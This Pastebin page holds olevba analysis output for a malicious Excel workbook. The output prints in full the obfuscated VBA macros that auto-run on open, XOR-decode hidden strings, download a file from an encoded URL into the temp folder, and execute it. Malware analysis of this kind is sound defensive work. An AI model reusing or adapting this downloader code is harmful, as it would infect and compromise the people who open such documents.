Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 1.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 1.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisBook.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisBook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- Phamt72loaj
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Page1.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Page2.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Page3.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Heroro6.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Heroro6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO File55.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File55'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '''+---- --+
- '''| Ariawase 0.6.0 |
- '''| Ariawase is free library for VBA cowboys. |
- '''| The Project Page: https://github.com/vbaidiot/Ariawase |
- '''+-- ----+
- Option Explicit
- Option Private Module
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------+----------------------+-------------+
- | Type | Keyword | Description |
- +------+----------------------+-------------+
- | IOC | https://github.com/v | URL |
- | | baidiot/Ariawase | |
- +------+----------------------+-------------+
- -------------------------------------------------------------------------------
- VBA MACRO File643.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File643'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Enum CdoProtocolsAuthentication
- cdoAnonymous = 0
- cdoBasic = 1
- cdoNTLM = 2
- End Enum
- Public Const cdo7bit As String = "7bit"
- Public Const cdo8bit As String = "8bit"
- Public Const cdoISO_2022_JP As String = "iso-2022-jp"
- Public Const cdoShift_JIS As String = "shift-jis"
- Public Const cdoEUC_JP As String = "euc-jp"
- Public Const cdoUTF_8 As String = "utf-8"
- Public Const cdoBase64 As String = "base64"
- Public Const cdoQuotedPrintable As String = "quoted-printable"
- Sub Phamt72loaj()
- Dim KLAKKKSMMCV As Integer
- For KLAKKKSMMCV = 0 To 0
- If KLAKKKSMMCV = 22 Then End
- Next KLAKKKSMMCV
- KokoRuko
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Loop4.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Loop4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const MBL = 8162
- Private Const AAN As String = "PRO1"
- Private Const IOTD = 1
- Private Const IFNCW = &H4000000
- Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
- #If VBA7 And Win64 Then
- Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
- #Else
- Dim HOHOFO2 As Long, HOHOFI1 As Long
- #End If
- Dim HIHORE2 As Long
- Dim HAHABU4 As String * MBL, HUHUHISD6 As String
- Dim HEHEIFI5 As Integer, KLOPA8 As Double
- HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
- If HOHOFO2 = 0 Then
- Exit Function
- End If
- HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
- If HOHOFI1 = 0 Then
- KLOPA8 = 0
- Else
- BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
- HUHUHISD6 = HAHABU4
- Do While HIHORE2 <> 0
- BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
- HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
- Loop
- KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
- Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
- Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
- End If
- HUDZOAKJJ HOHOFI1
- HUDZOAKJJ HOHOFO2
- HUHUHISD6 = ""
- If KLOPA8 Then
- TOPONO6 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Corob5.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Corob5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub cdsf56GG()
- GoTo cssghjtky7
- cssghjtky7:
- GoTo louioui89
- louioui89:
- GoTo mgsmshm
- mgsmshm:
- GoTo ntyntyty
- ntyntyty:
- GoTo nyttdndny
- nyttdndny:
- GoTo brtjtjty
- brtjtjty:
- End Sub
- Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
- Dim ziZItoTO1 As Long
- Dim loLOpoPO1 As String
- Dim keKEpePE1 As Integer
- Dim DKKALLLAKK As Integer
- For DKKALLLAKK = 0 To 0
- If DKKALLLAKK = 25 Then End
- Next DKKALLLAKK
- Dim keKEpePE11 As Integer
- For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
- keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
- keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
- Dim LOAJNNCDHJ As Integer
- For LOAJNNCDHJ = 0 To 0
- If LOAJNNCDHJ = 14 Then End
- Next LOAJNNCDHJ
- loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
- Dim PAPPAPPPAPP As Integer
- For PAPPAPPPAPP = 0 To 0
- If PAPPAPPPAPP = 4 Then End
- Next PAPPAPPPAPP
- Next ziZItoTO1
- MANAHD3 = loLOpoPO1
- End Function
- Private Sub IHYbeffeVuJC()
- GoTo asefbttttawf3
- asefbttttawf3:
- GoTo sgr4bsgbf67gfh
- sgr4bsgbf67gfh:
- GoTo sdvxcxb
- sdvxcxb:
- GoTo SSSDFBSS
- SSSDFBSS:
- GoTo UTYRURU
- UTYRURU:
- GoTo KKTKTJT
- KKTKTJT:
- GoTo IhzKeee2ascfacas2zw
- IhzKeee2ascfacas2zw:
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private xInit As Boolean
- Private xItems As Variant
- Private xLength As Long
- Public Property Get Item1() As Variant
- Dim i As Long: i = 0
- If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
- End Property
- Public Property Get Item2() As Variant
- Dim i As Long: i = 1
- If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
- End Property
- Public Property Get Item3() As Variant
- Dim i As Long: i = 2
- If xLength <= i Then Err.Raise 380
- If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
- End Property
- Public Property Get Item4() As Variant
- Dim i As Long: i = 3
- If xLength <= i Then Err.Raise 380
- If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
- End Property
- Public Sub Init(ParamArray itms() As Variant)
- If xInit Then Err.Raise 5
- xItems = itms
- xLength = UBound(itms) + 1
- If xLength < 2 Then Err.Raise 5
- xInit = True
- End Sub
- Public Function ToArray() As Variant
- ToArray = xItems
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D"
- Private Const rabannsd4 = 30
- Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C"
- Private Const rabannsd2 = 31
- Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C"
- Private Const rabannsd1 = 33
- Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D"
- Private Const rabannsd0 = 34
- Private Const ceew343vgVV = "Quyuiui3MM"
- Sub KokoRuko()
- Dim lodppo21
- Set lodppo21 = CreateObject _
- (MANAHD3(ceew343vgVV, cemMmm381))
- Dim UPANDNNN2
- Const conspol3 = 2
- Dim DLAPPAKKVD3 As Integer
- For DLAPPAKKVD3 = 0 To 0
- If DLAPPAKKVD3 = 4 Then End
- Next DLAPPAKKVD3
- Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
- Dim LPPAOOOAOAOMXNXNN As Integer
- For LPPAOOOAOAOMXNXNN = 0 To 0
- If LPPAOOOAOAOMXNXNN = 5 Then End
- Next LPPAOOOAOAOMXNXNN
- BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
- Dim PAOOKDKDKDAJWHNN21 As Integer
- For PAOOKDKDKDAJWHNN21 = 0 To 0
- If PAOOKDKDKDAJWHNN21 = 5 Then End
- Next PAOOKDKDKDAJWHNN21
- Set dwwwdFO2 = CreateObject _
- (MANAHD3(ceew343vgVV, cemMmm381))
- Dim ASS555ASS As Integer
- For ASS555ASS = 0 To 0
- If ASS555ASS = 5 Then End
- Next ASS555ASS
- If dwwwdFO2.FileExists(BIGABBDH1) Then
- dwwwdFO2.DeleteFile BIGABBDH1
- End If
- Dim APOHRKJBMXIKSHJ As Integer
- For APOHRKJBMXIKSHJ = 0 To 0
- If APOHRKJBMXIKSHJ = 15 Then End
- Next APOHRKJBMXIKSHJ
- If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
- End If
- Set SSSS = Nothing
- Dim ALOOEPPPEPP2 As Integer
- For ALOOEPPPEPP2 = 0 To 0
- If ALOOEPPPEPP2 = 8 Then End
- Next ALOOEPPPEPP2
- If dwwwdFO2.FileExists(BIGABBDH1) Then
- End If
- Dim PLKJHAGGGTTTS As Integer
- For PLKJHAGGGTTTS = 0 To 0
- If PLKJHAGGGTTTS = 3 Then End
- Next PLKJHAGGGTTTS
- Set SASASA = CreateObject _
- (MANAHD3(ceew343vgVV, vEVeE3286))
- Dim APQIEJAQPLQ As Integer
- For APQIEJAQPLQ = 0 To 0
- If APQIEJAQPLQ = 5 Then End
- Next APQIEJAQPLQ
- SASASA.Open BIGABBDH1
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement